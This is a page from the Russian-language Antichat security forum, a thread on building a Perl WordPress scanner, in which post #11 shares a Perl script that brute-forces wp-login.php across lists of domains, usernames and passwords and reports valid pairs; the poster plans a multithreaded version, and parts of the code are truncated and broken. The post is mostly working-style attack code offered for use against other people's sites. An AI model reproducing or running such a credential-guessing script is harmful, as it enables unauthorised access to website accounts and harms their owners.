HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
Перезагрузить страницу [Perl] Пилю велосипед. До аналога WPScan далеко...
   
Ответ
Страница 2 из 2 < 1 2
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 11.07.2015, 02:51
jslby
Познающий
Регистрация: 18.05.2015
Сообщений: 37
Провел на форуме:
13262

Репутация: 0
По умолчанию
Цитата:
Сообщение от Swat2k  

Ты передаешь не все параметры скрипту, смотри в лисе что уходит в скрипт. Исправил.
Код:
use strict;
use warnings;
use Getopt::Std;
use HTTP::Cookies;
use LWP;
use HTTP::Request::Common qw(POST);
use HTTP::Request::Common qw(GET);

my $cookie_jar = HTTP::Cookies->new(
    file => "cookies.dat",
    autosave => 1,
);

getopt('d:p:n:w:');
our($opt_d, $opt_p, $opt_n, $opt_w, $dfh, $nfh, $wfh);

open($dfh, '){
    chomp $thisDomain;

    open($nfh, '){
        chomp $thisName;

        open($wfh, '){
            chomp $thisPass;

            my $ua = LWP::UserAgent->new;
         
            $ua->cookie_jar($cookie_jar);
         
            my     $resp = $ua->post("http://$thisDomain/wp-login.php", { 'log' => $thisName ,
                                                                            'pwd' => $thisPass,
                                                                            'wp-sumbit' => 'Log In',
                                                                            'redirect_to' => "http://$thisDomain/wp-login.php",
                                                                            'rememberme' => 'forever',
                                                                            'testcookie' => 1});

         
            if($resp->is_redirect){
                print "Found: $thisName:$thisPass\n";
            }else{
                print "Not Found: $thisName:$thisPass $resp->status_line\n";
            }
         
            undef $resp;

            }
    }
}
Да, связка логин:пароль отслеживается. Спасибо! Но по странной причине при первой итерации в цикле так же выдает Found.

С потоками уже разобрался, сегодня выложу версию с мультипотоками
 
Ответить с цитированием

  #12  
Старый 26.09.2015, 22:21
cheebeez
Новичок
Регистрация: 28.02.2010
Сообщений: 5
Провел на форуме:
20360

Репутация: 0
По умолчанию
[DEL 24]
 
Ответить с цитированием
Ответ
Страница 2 из 2 < 1 2



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.